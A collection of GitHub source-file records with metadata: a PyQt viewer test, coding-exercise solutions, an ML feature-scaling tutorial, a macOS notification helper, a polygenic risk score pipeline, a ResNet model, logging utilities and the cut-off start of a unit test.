\"vectsize\":{\"width\":7.0, \"height\":7.0},\n \"rastsize\":{\"width\":750, \"height\":750},\n \"annotations\":annotations } )\n drawcmnds.append( { \"action\":\"save\",\n \"filename\":\"test.png\",\n \"vectsize\":{\"width\":7.0, \"height\":7.0},\n \"rastsize\":{\"width\":750, \"height\":750},\n \"annotations\":annotations } )\n drawcmnds.append( { \"action\":\"exit\" } )\n\n # start PyQt\n app = QApplication([\"PipedViewerPQ\"])\n # create a PipedViewerPQ in this process\n cmndrecvpipe, cmndsendpipe = Pipe(False)\n rspdrecvpipe, rspdsendpipe = Pipe(False)\n viewer = PipedViewerPQ(cmndrecvpipe, rspdsendpipe)\n # create a command submitter dialog\n tester = _CommandSubmitterPQ(viewer, cmndsendpipe,\n rspdrecvpipe, drawcmnds)\n tester.show()\n # let it all run\n result = app.exec_()\n if result != 0:\n sys.exit(result)\n\nif __name__ == \"__main__\":\n _test_pipedviewerpq()\n","repo_name":"NOAA-PMEL/PyFerret","sub_path":"pviewmod/pipedviewerpq.py","file_name":"pipedviewerpq.py","file_ext":"py","file_size_in_byte":87249,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"21"} +{"seq_id":"23693203060","text":"#프로그래머스 - 시저 암호 (12926)\ndef solution(s, n):\n answer = \"\"\n for i in range(len(s)):\n if not s[i] == \" \":\n if s[i].isupper() and ord(s[i]) + n > 90:\n tmp = ord(s[i]) + n - 90\n answer += chr(64 + tmp)\n elif s[i].islower() and ord(s[i]) + n > 122:\n tmp = ord(s[i]) + n - 122\n answer += chr(96 + tmp)\n else:\n answer += (chr(ord(s[i]) + n))\n else:\n answer += \" \"\n return answer\n","repo_name":"yeonjy/AlgorithmChallenge","sub_path":"Programmers/Level1/Python/pgm12926.py","file_name":"pgm12926.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11659213682","text":"file_c=open('근로소득세.txt','r',encoding='UTF-8')\nlist_all=file_c.readlines()\nprint(list_all)\n\n\nsalary=float(input(\"세전연봉:\"))\nnotax=float(input(\"비과세액:\"))\nfamily=int(input(\"부양가족수(본인포함):\"))\n\n\ndef sepList(x,y):\n list_1 = []\n list_2 = []\n list_3 = []\n\n dic={}\n for i in list_all:\n if \",\" in i:\n list_1.append(i)\n\n for i in list_1:\n temp = i.replace(',', '').replace('-', '0').replace('원', '').replace('x', '').replace('\\n','').rstrip()\n list_2.append(temp)\n\n for i in list_2:\n list_3.append(i.split('\\t'))\n\n for i in list_3:\n i[2:] = map(int, i[2:])\n dic[int(i[0]) <= x*0.0001 < int(i[1])] = i[2:]\n print(dic)\n krsds=dic[1][y-1]\n return krsds\n\nresult=sepList(salary,family)\nprint(result)\n\nraw=open('ㅇㅁ.txt','r',encoding='UTF-8')\nrawdata=raw.readlines()\nprint(rawdata)\nlista=[]\nfor i in range(len(rawdata)):\n rawdata[i]=rawdata[i].split('\\t')\nprint(rawdata)\ndef changeX(x,y=''):\n for i in range(len(rawdata)):\n for i in range(len(rawdata[i])):\n if x in rawdata[i][j]:\n rawdata[i][j]=rawdata[i][j].replace(x,y)\nchangeX('\\n')\nprint(rawdata)","repo_name":"seungwan97/Python","sub_path":"220404.py","file_name":"220404.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4965837151","text":"\"\"\" \r\nFeature Scaling\r\n- We discussed previously that the scale of the features is an important consideration when building machine \r\n learning models. \r\n\r\nBriefly:\r\n\r\nFeature magnitude matters because:\r\n- The regression coefficients of linear models are directly influenced by the scale of the variable.\r\n- Variables with bigger magnitude / larger value range dominate over those with smaller magnitude / value range\r\n- Gradient descent converges faster when features are on similar scales\r\n- Feature scaling helps decrease the time to find support vectors for SVMs\r\n- Euclidean distances are sensitive to feature magnitude.\r\n- Some algorithms, like PCA require the features to be centered at 0.\r\n\r\nThe machine learning models affected by the feature scale are:\r\n- Linear and Logistic Regression\r\n- Neural Networks\r\n- Support Vector Machines\r\n- KNN\r\n- K-means clustering\r\n- Linear Discriminant Analysis (LDA)\r\n- Principal Component Analysis (PCA)\r\n\r\nFeature Scaling\r\n- Feature scaling refers to the methods or techniques used to normalize the range of independent variables in our \r\n data, or in other words, the methods to set the feature value range within a similar scale. \r\n- Feature scaling is generally the last step in the data preprocessing pipeline, performed just before training the \r\n machine learning algorithms.\r\n\r\nThere are several Feature Scaling techniques, which we will discuss throughout this section:\r\n- Standardisation\r\n- Mean normalisation\r\n- Scaling to minimum and maximum values - MinMaxScaling\r\n- Scaling to maximum value - MaxAbsScaling\r\n- Scaling to quantiles and median - RobustScaling\r\n- Normalization to vector unit length\r\n\r\nIn this example, we will discuss Mean Normalisation.\r\n\r\n=================================================================\r\n\r\nMean Normalisation\r\n- Mean normalisation involves centering the variable at zero, and re-scaling to the value range. \r\n- The procedure involves subtracting the mean of each observation and then dividing by difference between the \r\n minimum and maximum value:\r\n\r\n x_scaled = (x - x_mean) / ( x_max - x_min)\r\n\r\n- The result of the above transformation is a distribution that is centered at 0, and its minimum and maximum values \r\n are within the range of -1 to 1. \r\n- The shape of a mean normalised distribution will be very similar to the original distribution of the variable, \r\n but the variance may change, so not identical.\r\n\r\n- Again, this technique will not normalize the distribution of the data thus if this is the desired outcome, we \r\n should implement any of the techniques discussed in section 0.5.\r\n\r\nIn a nutshell, mean normalisation:\r\n- centers the mean at 0\r\n- variance will be different\r\n- may alter the shape of the original distribution\r\n- the minimum and maximum values squeezed between -1 and 1\r\n- preserves outliers\r\n- Good for algorithms that require features centered at zero.\r\n\r\nIn this example\r\nWe will perform mean normalisation using the Boston House Prices data set that comes with Scikit-learn\r\n\r\nThere is no Scikit-learn transformer for mean normalisation, but we can implement it using a combination of 2 \r\nother transformers that I will discuss in detail in the next example. We will also implement it manually with pandas. \"\"\"\r\n\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport seaborn as sns\r\n# dataset for the demo\r\nfrom sklearn.datasets import load_boston\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# the scaler - for mean normalisation\r\nfrom sklearn.preprocessing import StandardScaler, RobustScaler\r\n# load the the Boston House price data\r\n\r\nboston_dataset = load_boston()\r\n\r\n# create a dataframe with the independent variables\r\ndata = pd.DataFrame(boston_dataset.data,\r\n columns=boston_dataset.feature_names)\r\n\r\n# add target\r\ndata['MEDV'] = boston_dataset.target\r\n\r\ndata.head()\r\n\"\"\" \r\n \"\"\"\r\n\r\n# Information about the boston house prince dataset\r\n# you will find details about the different variables\r\n\r\n# the aim is to predict the \"Median value of the houses\"\r\n# MEDV column in this dataset\r\n\r\n# and there are variables with characteristics about\r\n# the homes and the neighborhoods\r\n\r\n# print the dataset description\r\nprint(boston_dataset.DESCR)\r\n\"\"\" .. _boston_dataset:\r\n\r\nBoston house prices dataset\r\n---------------------------\r\n\r\n**Data Set Characteristics:** \r\n\r\n :Number of Instances: 506 \r\n\r\n :Number of Attributes: 13 numeric/categorical predictive. Median Value (attribute 14) is usually the target.\r\n\r\n :Attribute Information (in order):\r\n - CRIM per capita crime rate by town\r\n - ZN proportion of residential land zoned for lots over 25,000 sq.ft.\r\n - INDUS proportion of non-retail business acres per town\r\n - CHAS Charles River dummy variable (= 1 if tract bounds river; 0 otherwise)\r\n - NOX nitric oxides concentration (parts per 10 million)\r\n - RM average number of rooms per dwelling\r\n - AGE proportion of owner-occupied units built prior to 1940\r\n - DIS weighted distances to five Boston employment centres\r\n - RAD index of accessibility to radial highways\r\n - TAX full-value property-tax rate per $10,000\r\n - PTRATIO pupil-teacher ratio by town\r\n - B 1000(Bk - 0.63)^2 where Bk is the proportion of blacks by town\r\n - LSTAT % lower status of the population\r\n - MEDV Median value of owner-occupied homes in $1000's\r\n\r\n :Missing Attribute Values: None\r\n\r\n :Creator: Harrison, D. and Rubinfeld, D.L.\r\n\r\nThis is a copy of UCI ML housing dataset.\r\nhttps://archive.ics.uci.edu/ml/machine-learning-databases/housing/\r\n\r\n\r\nThis dataset was taken from the StatLib library which is maintained at Carnegie Mellon University.\r\n\r\nThe Boston house-price data of Harrison, D. and Rubinfeld, D.L. 'Hedonic\r\nprices and the demand for clean air', J. Environ. Economics & Management,\r\nvol.5, 81-102, 1978. Used in Belsley, Kuh & Welsch, 'Regression diagnostics\r\n...', Wiley, 1980. N.B. Various transformations are used in the table on\r\npages 244-261 of the latter.\r\n\r\nThe Boston house-price data has been used in many machine learning papers that address regression\r\nproblems. \r\n \r\n.. topic:: References\r\n\r\n - Belsley, Kuh & Welsch, 'Regression diagnostics: Identifying Influential Data and Sources of Collinearity', Wiley, 1980. 244-261.\r\n - Quinlan,R. (1993). Combining Instance-Based and Model-Based Learning. In Proceedings on the Tenth International Conference of Machine Learning, 236-243, University of Massachusetts, Amherst. Morgan Kaufmann. \"\"\"\r\n\r\n# let's have a look at the main statistical parameters of the variables\r\n# to get an idea of the feature magnitudes\r\n\r\ndata.describe()\r\n\"\"\" \r\n\r\n\r\nThe different variables present different value ranges, mean, max, min, standard deviations, etc. In other words, they show different magnitudes or scales. Note for this demo, how the mean values are not centered at zero, and the min and max value vary across a big range.\r\n\r\nWhen performing mean normalisation on the data set, we need to first identify the mean and minimum and maximum values of the variables. These parameters need to be learned from the train set, stored, and then used to scale test and future data. Thus, we will first divide the data set into train and test, as we have done throughout the course.\r\n\"\"\"\r\n\r\n# let's separate the data into training and testing set\r\nX_train, X_test, y_train, y_test = train_test_split(data.drop('MEDV', axis=1),\r\n data['MEDV'],\r\n test_size=0.3,\r\n random_state=0)\r\n\r\nX_train.shape, X_test.shape\r\n# ((354, 13), (152, 13))\r\n\r\n\"\"\" Mean Normalisation with pandas \"\"\"\r\n# let's first learn the mean from the train set\r\n\r\nmeans = X_train.mean(axis=0)\r\n\r\nmeans\r\n\"\"\" \r\nCRIM 3.358284\r\nZN 11.809322\r\nINDUS 11.078757\r\nCHAS 0.064972\r\nNOX 0.556098\r\nRM 6.308427\r\nAGE 68.994068\r\nDIS 3.762459\r\nRAD 9.353107\r\nTAX 401.782486\r\nPTRATIO 18.473446\r\nB 360.601186\r\nLSTAT 12.440650\r\ndtype: float64 \"\"\"\r\n\r\n# let's now learn the min and max values, and the value range \r\n# from the train set\r\n\r\nranges = X_train.max(axis=0)-X_train.min(axis=0)\r\n\r\nranges\r\n\"\"\" CRIM 88.96988\r\nZN 100.00000\r\nINDUS 27.28000\r\nCHAS 1.00000\r\nNOX 0.48600\r\nRM 5.21900\r\nAGE 97.10000\r\nDIS 10.95230\r\nRAD 23.00000\r\nTAX 524.00000\r\nPTRATIO 9.40000\r\nB 396.58000\r\nLSTAT 35.25000\r\ndtype: float64 \"\"\"\r\n\r\n# now we are ready to perform mean normalisation:\r\nX_train_scaled = (X_train - means) / ranges\r\nX_test_scaled = (X_test - means) / ranges\r\n\r\n# let's have a look at the original training dataset: mean and min, max values\r\n# I use np.round to reduce the number of decimals to 1.\r\n\r\nnp.round(X_train.describe(), 1)\r\n\"\"\" \r\n \"\"\"\r\n\r\n# let's have a look at the scaled training dataset: mean and min, max values\r\n# I use np.round to reduce the number of decimals to 1.\r\n\r\nnp.round(X_train_scaled.describe(), 1)\r\n\"\"\" \r\n\r\n\r\n- As expected, the mean of each variable, which were not centered at zero, is now around zero and the min and max \r\n values vary approximately between -1 and 1. \r\n- Note however, that the standard deviations vary according to how spread the variable was to begin with and is highly \r\n influenced by the presence of outliers.\r\n\"\"\"\r\n\r\n# let's compare the variable distributions before and after scaling\r\n\r\nfig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(12, 5))\r\n\r\n# before scaling\r\nax1.set_title('Before Scaling')\r\nsns.kdeplot(X_train['RM'], ax=ax1)\r\nsns.kdeplot(X_train['LSTAT'], ax=ax1)\r\nsns.kdeplot(X_train['CRIM'], ax=ax1)\r\n\r\n# after scaling\r\nax2.set_title('After Mean Normalisation')\r\nsns.kdeplot(X_train_scaled['RM'], ax=ax2)\r\nsns.kdeplot(X_train_scaled['LSTAT'], ax=ax2)\r\nsns.kdeplot(X_train_scaled['CRIM'], ax=ax2)\r\nplt.show()\r\n\r\n\"\"\" \r\n- As we can see the main effect of mean normalisation was to center all the distributions at zero, and the values \r\n vary between -1 and 1. \"\"\"\r\n\r\n# let's compare the variable distributions before and after scaling\r\n\r\nfig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(12, 5))\r\n\r\n# before scaling\r\nax1.set_title('Before Scaling')\r\nsns.kdeplot(X_train['AGE'], ax=ax1)\r\nsns.kdeplot(X_train['DIS'], ax=ax1)\r\nsns.kdeplot(X_train['NOX'], ax=ax1)\r\n\r\n# after scaling\r\nax2.set_title('After Mean Normalisation')\r\nsns.kdeplot(X_train_scaled['AGE'], ax=ax2)\r\nsns.kdeplot(X_train_scaled['DIS'], ax=ax2)\r\nsns.kdeplot(X_train_scaled['NOX'], ax=ax2)\r\nplt.show()\r\n\r\n\"\"\" \r\n- Compare these plots, with those derived by standardisation in the previous notebook to better understand how these \r\n procedures are not identical.\r\n\r\nMean Normalisation with Scikit-learn: work-around\r\n- We can implement mean normalisation by combining the use of 2 transformers. \r\n- A bit dirty, if you ask me, but if you are desperate to implement this technique with sklearn, this could be a way \r\n forward.\r\n\"\"\"\r\n\r\n# set up the StandardScaler so that it removes the mean\r\n# but does not divide by the standard deviation\r\nscaler_mean = StandardScaler(with_mean=True, with_std=False)\r\n\r\n# set up the robustscaler so that it does NOT remove the median\r\n# but normalises by max()-min(), important for this to set up the\r\n# quantile range to 0 and 100, which represent the min and max values\r\nscaler_minmax = RobustScaler(with_centering=False,\r\n with_scaling=True,\r\n quantile_range=(0, 100))\r\n\r\n# fit the scalers to the train set, it will learn the parameters\r\nscaler_mean.fit(X_train)\r\nscaler_minmax.fit(X_train)\r\n\r\n# transform train and test sets\r\nX_train_scaled = scaler_minmax.transform(scaler_mean.transform(X_train))\r\nX_test_scaled = scaler_minmax.transform(scaler_mean.transform(X_test))\r\n\r\n# let's transform the returned NumPy arrays to dataframes for the rest of the example\r\n\r\nX_train_scaled = pd.DataFrame(X_train_scaled, columns=X_train.columns)\r\nX_test_scaled = pd.DataFrame(X_test_scaled, columns=X_test.columns)\r\n\r\nnp.round(X_train_scaled.describe(), 1)\r\n\"\"\" \r\n\r\n\r\n- See how this output is identical to the above output, where we did the scaling manually. \r\n\r\n- That is all for this example. I hope you enjoyed the info, and see you in the next one.\"\"\"","repo_name":"Akshaykumarcp/ML-Feature-Engineering","sub_path":"0.8_feature_scaling/0.8.2_mean_normalisation.py","file_name":"0.8.2_mean_normalisation.py","file_ext":"py","file_size_in_byte":12558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22895421691","text":"#!/usr/bin/python\n\n# A simple example on how to dynamically send a NotificationCenter notification\n# which is similar in vain to Yo, but is written in pure python. You can spoof\n# any application icon, so if Apple ever deems this an issue, it could break.\n\n# Written by Erik Gomez, but most of this code was originally written by Greg\n# Neagle and Michael Lynn.\nfrom Foundation import (NSBundle, NSUserNotificationCenter, NSUserNotification)\nimport time\n\n\ndef set_fake_bundleid(bundleid):\n bundle = NSBundle.mainBundle()\n info = bundle.localizedInfoDictionary() or bundle.infoDictionary()\n # override the bundleid with the one we want\n info['CFBundleIdentifier'] = bundleid\n\n\ndef notify(title, bundleid=None):\n if bundleid:\n # fake our bundleid\n set_fake_bundleid(bundleid)\n\n # create a new user notification\n notification = NSUserNotification.alloc().init()\n notification.setTitle_(title)\n notification.setHasActionButton_(False)\n notification.setSoundName_(None)\n\n # get the default User Notification Center\n nc = NSUserNotificationCenter.defaultUserNotificationCenter()\n\n # Wait just a bit\n time.sleep(1)\n\n # Kill all old notifications so we can only show new notifications\n nc.removeAllDeliveredNotifications()\n\n # deliver the notification\n nc.deliverNotification_(notification)\n\n\ndef main():\n # Pass your text on the first argument and the bundleid you want to spoof\n # on the second.\n notify(u'Device Enrollment Beginning...', bundleid='com.apple.appstore')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"erikng/mdmscripts","sub_path":"dep/userscripts/notificationcenter_example.py","file_name":"notificationcenter_example.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"21"} +{"seq_id":"72138174454","text":"import coffee_machine_POO\nimport os\n\n# Creating menu items\n\nespresso = coffee_machine_POO.MenuItem(\"espresso\", 1.5, {\"water\": 50, \"milk\": 0, \"coffee\": 18})\nlatte = coffee_machine_POO.MenuItem(\"latte\", 2.5, {\"water\": 200, \"milk\": 150, \"coffee\": 24})\ncappuccino = coffee_machine_POO.MenuItem(\"cappuccino\", 3.0, {\"water\": 250, \"milk\": 100, \"coffee\": 24})\n\n# Resources\n# coffee_machine_POO.CoffeeMaker.initialIngredients()\n\ncoffee_machine = coffee_machine_POO.CoffeeMaker()\nmenu = coffee_machine_POO.Menu()\n\n\n\n\n\n\n\nmachine = \"on\"\nwhile machine != \"off\":\n \n # Cleaning screen\n os.system('cls')\n choice = input(\"What would you like? (espresso/latte/cappuccino): \")\n\n # Introduce \"report\" to see available ingredients\n if choice == \"report\":\n coffee_machine.report()\n else:\n drink = menu.find_drink(choice)\n if coffee_machine.is_resource_sufficient((drink)):\n coffee_machine.make_coffee(drink)\n else:\n print(\"Sorry, there are not enough ingredients\")\n\n machine = input(\"Would you like another drink? ('on' to continue, 'off' to finish) :\")","repo_name":"cynthiatcelorio/100_days_of_code-Pyhton","sub_path":"days_11-20/day16 (POO)/coffee_main.py","file_name":"coffee_main.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22903887032","text":"class ListNode(object):\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution(object):\n def mergeKLists(self, lists):\n if not len(lists) or len(lists) == 1:\n return lists[0] if lists else None\n \n mid = len(lists) // 2\n left, right = self.mergeKLists(lists[:mid]), self.mergeKLists(lists[mid:])\n return self.merge(left, right)\n \n def merge(self, list1, list2):\n curr = dummy = ListNode()\n \n while list1 and list2:\n if list1.val > list2.val:\n curr.next = list2\n list2 = list2.next\n else:\n curr.next = list1 \n list1 = list1.next\n \n curr = curr.next\n \n if list1:\n curr.next = list1\n elif list2:\n curr.next = list2\n \n return dummy.next\n \n\nclass Solution:\n def mergeKLists(self, lists):\n if not lists or len(lists) == 0:\n return None\n\n while len(lists) > 1:\n mergedLists = []\n for i in range(0, len(lists), 2):\n l1 = lists[i]\n l2 = lists[i + 1] if (i + 1) < len(lists) else None\n mergedLists.append(self.mergeList(l1, l2))\n lists = mergedLists\n return lists[0]\n\n def mergeList(self, l1, l2):\n dummy = ListNode()\n tail = dummy\n\n while l1 and l2:\n if l1.val < l2.val:\n tail.next = l1\n l1 = l1.next\n else:\n tail.next = l2\n l2 = l2.next\n tail = tail.next\n if l1:\n tail.next = l1\n if l2:\n tail.next = l2\n return dummy.next","repo_name":"merthamit/Over-300-leetcode-solutions","sub_path":"leetcodes questions/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72681905014","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n#----------------------------------------------------------------------------\n# Created By: David Aurelia Ayala Usma\n# Created Date: 2022-09-13\n# Version = 0.0.1\n# ---------------------------------------------------------------------------\n\n## Description\n\"\"\"Main module to calculate two Polygenic Risk Score models for several individuals\"\"\"\n\n# ---------------------------------------------------------------------------\n## Required libraries\nimport os\nimport argparse\nimport numpy as np\nimport requests as rq\nfrom datetime import datetime\nfrom timeit import default_timer as timer\n\n## Parallelized pandas\nos.environ[\"MODIN_ENGINE\"] = \"ray\"\nimport ray\nray.init()\nimport modin.pandas as pd\n\n# ---------------------------------------------------------------------------\n## Importing the individual PRS module\nimport individual_prs as prs\n\n# ---------------------------------------------------------------------------\n## Argument parser\nparser = argparse.ArgumentParser(description='This package calculates the PRS scores for a condition in different individuals under different provided models. It also summarizes the data for analysis.')\nparser.add_argument('user_data', type=str, nargs=1,\n help=\"\"\"File containing a table with two columns. The first column describes presence or absence of the condition in an individual. \n The second one is an OpenSNP file id that references the genotype of an individual for download.\"\"\")\nparser.add_argument('prs_model', type=str, nargs='+',\n help=\"\"\"File containing a table with two columns describing the PRS model coefficients. The first column contains the variants identifiers (rsIDs) considered in the model. \n The second column contains the weights (beta coefficients) of each variant. Multiple models can be specified.\"\"\")\nparser.add_argument('--out', type=str, default='cohort_prs_out.csv',\n help=\"\"\"Name of the output DataFrame. (Default: cohort_prs_out.csv)\"\"\")\n \nargs = parser.parse_args()\n\n# ---------------------------------------------------------------------------\n## Main function\n\ndef main(args):\n \n ## Reading the PRS models data \n t_start = timer()\n\n models = {}\n for model_path in args.prs_model:\n model_name = os.path.splitext(os.path.basename(model_path))[0]\n models[model_name] = pd.read_csv(model_path, sep='\\t')\n\n t_end = timer()\n print(\"[{timestamp}]: Data from the PRS models successfully loaded! ----- Time elapsed (s): {time}\".format(timestamp=datetime.now(), time=(t_end - t_start)))\n\n ## Obtaining the major (non-effect) allele for the variants considered in each model\n t_step = timer()\n\n models_alleles = {k: prs.get_major_alleles_model(v) for k, v in models.items()}\n del models\n\n t_end = timer()\n print(\"[{timestamp}]: Major (non-effect) alleles successfully recovered! ----- Time elapsed (s): {time}\".format(timestamp=datetime.now(), time=(t_end - t_step)))\n\n ## Reading the list of genotyped users and conditions to evaluate\n t_step = timer()\n\n indiv_data = pd.read_csv(args.user_data[0], sep='\\t', comment='#')\n\n t_end = timer()\n print(\"[{timestamp}]: List of individuals' OpenSNP IDs and conditions successfully loaded! ----- Time elapsed (s): {time}\".format(timestamp=datetime.now(), time=(t_end - t_step)))\n\n ## Obtaining the genotypes of all the individuals\n t_step = timer()\n\n def parallel_retrieval_genotypes(user_series):\n user_id = user_series['file_link']\n genotype_individual = prs.get_genotype_individual(user_id)\n return genotype_individual\n \n users_genotypes = indiv_data.apply(lambda x: parallel_retrieval_genotypes(x), axis=1)\n users_genotypes = users_genotypes.set_axis(indiv_data['file_link'])\n\n t_end = timer()\n print(\"[{timestamp}]: Genotype data of individuals successfully retrieved from OpenSNP! ----- Time elapsed (s): {time}\".format(timestamp=datetime.now(), time=(t_end - t_step)))\n\n ## Merge genotypes with the models and store them in a dictionary and calculating the PRS by individual per model\n t_step = timer()\n\n prs_scores_dict = {}\n for name, model in models_alleles.items():\n prs_scores_dict[name] = users_genotypes.apply(lambda x: prs.calculating_prs_individual(prs.merge_allelic_data(x, model)), axis=1)\n t_end = timer()\n print(\"[{timestamp}]: Cohort PRS for {model_name} successfully calculated! ----- Time elapsed (s): {time}\".format(timestamp=datetime.now(), model_name=name, time=(t_end - t_step)))\n\n ## Producing the final dataset with individuals, condition, and PRS scores per model\n t_step = timer()\n\n for model, prs_score in prs_scores_dict.items():\n column = prs_score.to_frame().reset_index()\n column.columns = ['file_link', 'PRS_{model}'.format(model=model)]\n indiv_data = indiv_data.merge(column, on='file_link', how='inner')\n \n t_end = timer()\n print(\"[{timestamp}]: PRSs of the cohort for all models successfully calculated! ----- Time elapsed (s): {time}\".format(timestamp=datetime.now(), time=(t_end - t_step)))\n\n t_end = timer()\n print(\"[{timestamp}]: Workflow finished, bye! ----- Runtime of the entire workflow (s): {time}\".format(timestamp=datetime.now(), time=(t_end - t_start)))\n return indiv_data\n\n# ---------------------------------------------------------------------------\n## Boilerplate for command line execution of main function for testing\nif __name__ == '__main__':\n t_prs_start = timer()\n print(\"[{timestamp}]: Cohort PRS calculator started!!!\".format(timestamp=datetime.now()))\n \n results = main(args)\n results.to_csv(args.out, index=False)\n \n t_prs_end = timer()\n print(\"[{timestamp}]: Script-mode execution finished, bye! ----- Runtime of the workflow in script mode (s): {time}\".format(timestamp=datetime.now(), time=(t_prs_end - t_prs_start)))","repo_name":"ayala-usma/openPRS","sub_path":"src/cohort_prs.py","file_name":"cohort_prs.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"2048968019","text":"import torch\nimport torch.nn as nn\nimport os\nimport torchvision.models as models\n\nfrom global_params import pretrainedPath\n\nclass Frame2dResNet50(nn.Module) :\n def __init__(self, use_pretrain=-1, num_classes=200) :\n super().__init__()\n self.frame_model = models.resnet50(num_classes=num_classes) ## back to 50\n if (use_pretrain >= 0) :\n self.loadPretrainedParam(use_pretrain)\n \n def forward(self, x) :\n B, C, T, H, W = x.shape\n if self.training :\n return self.frame_model(x[:,:,T//2,:,:])\n else :\n logits = self.frame_model(x.permute(0, 2, 1, 3, 4).contiguous().view(-1, C, H, W))\n return logits.view(B, T, -1).mean(dim=1)\n \n def loadPretrainedParam(self, n_levels) :\n assert(n_levels <= 4)\n resnet_imgnet_checkpoint = torch.load(os.path.join(pretrainedPath, 'resnet50-19c8e357.pth'))\n states_to_load = {}\n for name, param in resnet_imgnet_checkpoint.items() :\n if name.startswith('fc') :\n continue\n if name.startswith('layer') :\n if int(name[5]) <= n_levels :\n states_to_load[name]=param\n else :\n states_to_load[name]=param\n model_state = self.frame_model.state_dict()\n model_state.update(states_to_load)\n self.frame_model.load_state_dict(model_state)","repo_name":"hyin-stanford/project-moments","sub_path":"2dResNet/Frame2dResNet50.py","file_name":"Frame2dResNet50.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18443689583","text":"import numpy as np\nimport datetime\nfrom utils.file_handling import get_file_name, get_path\n\npath = get_path()\n\n\ndef print_parameters(par: dict) -> None:\n \"\"\"\n Prints user defined parameters. \n \"\"\"\n print_log(par,\n \"dataset name: \",par[\"dataset_name\"],\", date : \",datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\" \\n\"\n\n \" using appliances: \", par['appliances'],\"\\n\"\n\n \" transtype: \",par[\"trs_type\"],\"\\n\"\n \" gaf trans type: \"f\"{par['trs_type_gaf']}\",\"\\n\"\n\n \" windows size in mins: \"f\"{par['step_in_mins']}\",\"\\n\"\n \" image size in pixels: \"f\"{par['img_size']}\",\"\\n\"\n\n \" sample period: \"f\"{par['resample_period']}\",\"\\n\"\n\n \" number if images that are stacked together and in series(series!): \"f\"{par['frames']}\",\"\\n\"\n \" allowed max delta between images \"f\"{par['allowed_delta_between_frames']}\",\"\\n\"\n\n \" added brightness: \"f\"{par['add_brightness']}\",\"\\n\"\n\n \" save source timeseries: \"f\"{par['ts_save']}\",\"\\n\"\n \n \" manually select appliances: \"f\"{par['manually_select_appliances']}\",\"\\n\"\n\n \" number of appliances: \"f\"{len(par['appliances'])}\",\"\\n\"\n \" number of buildings: \"f\"{par['n_buildings']}\",\"\\n\"\n\n \" max number of images per appliance per building: \"f\"{par['max_images']}\",\"\\n\"\n\n \" include multiple buildings (Y for Yes N for No): \"f\"{par['multiple_buildings']}\",\"\\n\"\n \" building selected: \"f\"{par['selected_building']}\",\"\\n\"\n )\n\n\ndef print_log(par: dict, *args, **kwargs):\n \"\"\"\n Prints log to stdout and file. \n \"\"\"\n print(*args, **kwargs)\n file_name = get_file_name(par)\n\n with open(path+file_name+\"_log.txt\",'a') as file:\n print(*args, **kwargs, file=file)\n\n\ndef print_progress(i: int, signal_stack: np.ndarray, img_stack: np.ndarray, next_percent:int, par: dict) -> int:\n \"\"\"\n Prints current progress of transformation every 10 %.\n \"\"\"\n signal_slices_len = signal_stack.shape[0]\n img_stack_len = img_stack.shape[0]\n \n if round(100*i/(signal_slices_len),2) > next_percent:\n next_percent += 10\n print_log(par,\"processed: \"f\"{round(100*i/(signal_slices_len), 2)} % finished: \"f\"{round(100*((img_stack_len)/par['max_images']), 2)} %\")\n \n return next_percent\n\n \ndef print_end_of_loop(images_stacked: int, appliance: str, par: dict):\n \"\"\"\n Informs user that script has reached the end of the loop.\n \"\"\"\n print_log(par,\"\\n\")\n print_log(par,\"number of images (per appliance) stacked: \"f\"{images_stacked}\")\n \n print_log(par,\"finished \"f\"{appliance}\")\n print_log(par,\"\\n\")\n\n\ndef print_end(all_images_stacked: int, healthy_appliances: int, par: dict):\n \"\"\"\n Informs user that script has come to an end. \n \"\"\"\n print_log(par,\"num of images stored: \", all_images_stacked)\n print_log(par,\"appliances stored: \", healthy_appliances)\n","repo_name":"jenkoj/ts2img","sub_path":"utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11940469657","text":"import unittest\r\nimport uuid\r\nimport os\r\nimport Navigation.prod.Fix as F\r\nimport Navigation.prod.Sighting as Sighting\r\nimport Navigation.prod.Angle as Angle\r\nimport Navigation.prod.LogFile as LogFile\r\nimport Navigation.prod.SightingsList as SightingsList\r\nimport xml.etree.ElementTree as ET\r\n\r\nclass TestFix(unittest.TestCase):\r\n \r\n def setUp(self):\r\n self.className = \"Fix.\"\r\n self.logStartString = \"Start of log\"\r\n self.logSightingString = \"Start of sighting file\"\r\n \r\n # set default log file name\r\n self.DEFAULT_LOG_FILE = \"log.txt\"\r\n if(os.path.isfile(self.DEFAULT_LOG_FILE)):\r\n os.remove(self.DEFAULT_LOG_FILE)\r\n \r\n # generate random log file name\r\n self.RANDOM_LOG_FILE = \"log\" + str(uuid.uuid4())[-12:] + \".txt\"\r\n \r\n \r\n self.fix = F.Fix()\r\n self.sighting = Sighting.Sighting(\"BodyName\", \"2016-03-15\", \"23:15:01\", 